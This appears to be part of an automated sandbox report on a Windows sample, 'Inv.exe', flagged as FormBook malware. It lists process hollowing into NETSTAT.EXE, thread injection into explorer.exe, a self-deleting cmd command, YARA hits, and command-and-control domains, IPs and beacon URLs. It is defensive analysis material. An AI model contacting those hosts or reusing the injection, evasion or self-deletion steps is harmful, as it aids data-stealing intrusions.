Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE5BA5 mov eax, dword ptr fs:[00000030h] 4_2_02EE5BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED138A mov eax, dword ptr fs:[00000030h] 4_2_02ED138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECD380 mov ecx, dword ptr fs:[00000030h] 4_2_02ECD380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h] 4_2_02E21B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42397 mov eax, dword ptr fs:[00000030h] 4_2_02E42397
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4B390 mov eax, dword ptr fs:[00000030h] 4_2_02E4B390
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1DB60 mov ecx, dword ptr fs:[00000030h] 4_2_02E1DB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h] 4_2_02E43B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1DB40 mov eax, dword ptr fs:[00000030h] 4_2_02E1DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8B58 mov eax, dword ptr fs:[00000030h] 4_2_02EE8B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1F358 mov eax, dword ptr fs:[00000030h] 4_2_02E1F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED131B mov eax, dword ptr fs:[00000030h] 4_2_02ED131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h] 4_2_02E140E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E158EC mov eax, dword ptr fs:[00000030h] 4_2_02E158EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h] 4_2_02EAB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAB8D0 mov ecx, dword ptr fs:[00000030h] 4_2_02EAB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h] 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E590AF mov eax, dword ptr fs:[00000030h] 4_2_02E590AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4F0BF mov ecx, dword ptr fs:[00000030h] 4_2_02E4F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h] 4_2_02E4F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19080 mov eax, dword ptr fs:[00000030h] 4_2_02E19080
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h] 4_2_02E93884
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE1074 mov eax, dword ptr fs:[00000030h] 4_2_02EE1074
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED2073 mov eax, dword ptr fs:[00000030h] 4_2_02ED2073
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h] 4_2_02E30050
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h] 4_2_02E2B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h] 4_2_02E4002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h] 4_2_02E3A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h] 4_2_02EE4015
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h] 4_2_02E97016
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h] 4_2_02E1B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EA41E8 mov eax, dword ptr fs:[00000030h] 4_2_02EA41E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h] 4_2_02E461A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h] 4_2_02ED49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E969A6 mov eax, dword ptr fs:[00000030h] 4_2_02E969A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h] 4_2_02E951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3C182 mov eax, dword ptr fs:[00000030h] 4_2_02E3C182
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A185 mov eax, dword ptr fs:[00000030h] 4_2_02E4A185
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42990 mov eax, dword ptr fs:[00000030h] 4_2_02E42990
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1C962 mov eax, dword ptr fs:[00000030h] 4_2_02E1C962
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h] 4_2_02E1B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h] 4_2_02E3B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h] 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120 mov ecx, dword ptr fs:[00000030h] 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h] 4_2_02E4513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h] 4_2_02E19100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E276E2 mov eax, dword ptr fs:[00000030h] 4_2_02E276E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E416E0 mov ecx, dword ptr fs:[00000030h] 4_2_02E416E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E58EC7 mov eax, dword ptr fs:[00000030h] 4_2_02E58EC7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E436CC mov eax, dword ptr fs:[00000030h] 4_2_02E436CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECFEC0 mov eax, dword ptr fs:[00000030h] 4_2_02ECFEC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8ED6 mov eax, dword ptr fs:[00000030h] 4_2_02EE8ED6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h] 4_2_02EE0EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E946A7 mov eax, dword ptr fs:[00000030h] 4_2_02E946A7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAFE87 mov eax, dword ptr fs:[00000030h] 4_2_02EAFE87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2766D mov eax, dword ptr fs:[00000030h] 4_2_02E2766D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h] 4_2_02E3AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h] 4_2_02E27E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h] 4_2_02EDAE44
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1E620 mov eax, dword ptr fs:[00000030h] 4_2_02E1E620
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECFE3F mov eax, dword ptr fs:[00000030h] 4_2_02ECFE3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h] 4_2_02E1C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E48E00 mov eax, dword ptr fs:[00000030h] 4_2_02E48E00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1608 mov eax, dword ptr fs:[00000030h] 4_2_02ED1608
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h] 4_2_02E4A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E537F5 mov eax, dword ptr fs:[00000030h] 4_2_02E537F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E28794 mov eax, dword ptr fs:[00000030h] 4_2_02E28794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h] 4_2_02E97794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2FF60 mov eax, dword ptr fs:[00000030h] 4_2_02E2FF60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8F6A mov eax, dword ptr fs:[00000030h] 4_2_02EE8F6A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2EF40 mov eax, dword ptr fs:[00000030h] 4_2_02E2EF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h] 4_2_02E14F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4E730 mov eax, dword ptr fs:[00000030h] 4_2_02E4E730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h] 4_2_02EE070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h] 4_2_02E4A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3F716 mov eax, dword ptr fs:[00000030h] 4_2_02E3F716
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h] 4_2_02EAFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED14FB mov eax, dword ptr fs:[00000030h] 4_2_02ED14FB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h] 4_2_02E96CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8CD6 mov eax, dword ptr fs:[00000030h] 4_2_02EE8CD6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2849B mov eax, dword ptr fs:[00000030h] 4_2_02E2849B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3746D mov eax, dword ptr fs:[00000030h] 4_2_02E3746D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A44B mov eax, dword ptr fs:[00000030h] 4_2_02E4A44B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h] 4_2_02EAC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4BC2C mov eax, dword ptr fs:[00000030h] 4_2_02E4BC2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h] 4_2_02EE740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h] 4_2_02E96C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h] 4_2_02E2D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h] 4_2_02EDFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EC8DF1 mov eax, dword ptr fs:[00000030h] 4_2_02EC8DF1
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01236B80 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc, 0_2_01236B80
Enables debug privileges
Source: C:\Users\user\Desktop\Inv.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0123C0A3
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0123C080 SetUnhandledExceptionFilter, 0_2_0123C080
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0123C0A3
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0123C080 SetUnhandledExceptionFilter, 1_2_0123C080

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 172.96.186.206 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Inv.exe Section loaded: unknown target: C:\Users\user\Desktop\Inv.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Inv.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Inv.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Inv.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Inv.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Inv.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 3F0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Inv.exe Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
Source: explorer.exe, 00000002.00000000.675251989.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0123D7B7 cpuid 0_2_0123D7B7
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01238431 GetLocalTime, 0_2_01238431

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

Behavior Graph:

Behavior Graph ID: 339347 Sample: Inv.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100

Start node: contacts www.hwcailing.com; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 5 other signatures
  Inv.exe (started): Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
    Inv.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (injected): System process connects to network (likely due to code injection or exploit); contacts www.achonabu.com 172.96.186.206, 49767, 80 SINGLEHOP-LLCUS Canada; nationshiphop.com 34.102.136.180, 49759, 49769, 80 GOOGLEUS United States; 7 other IPs or domains
        NETSTAT.EXE (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe (started)
            conhost.exe (started)
        autofmt.exe (started)

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
198.54.117.217 unknown United States 22612 NAMECHEAP-NETUS false
34.102.136.180 unknown United States 15169 GOOGLEUS true
172.96.186.206 unknown Canada 32475 SINGLEHOP-LLCUS true

Contacted Domains

Name IP Active
parkingpage.namecheap.com 198.54.117.217 true
www.hwcailing.com 107.160.136.152 true
millcityloam.com 34.102.136.180 true
www.achonabu.com 172.96.186.206 true
nationshiphop.com 34.102.136.180 true
www.zhaowulu.com unknown unknown
www.millcityloam.com unknown unknown
www.nationshiphop.com unknown unknown
www.a-zsolutionsllc.com unknown unknown
www.jacmkt.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p true Avira URL Cloud: safe unknown
http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP true Avira URL Cloud: safe unknown
http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 true Avira URL Cloud: safe unknown
http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer true Avira URL Cloud: safe unknown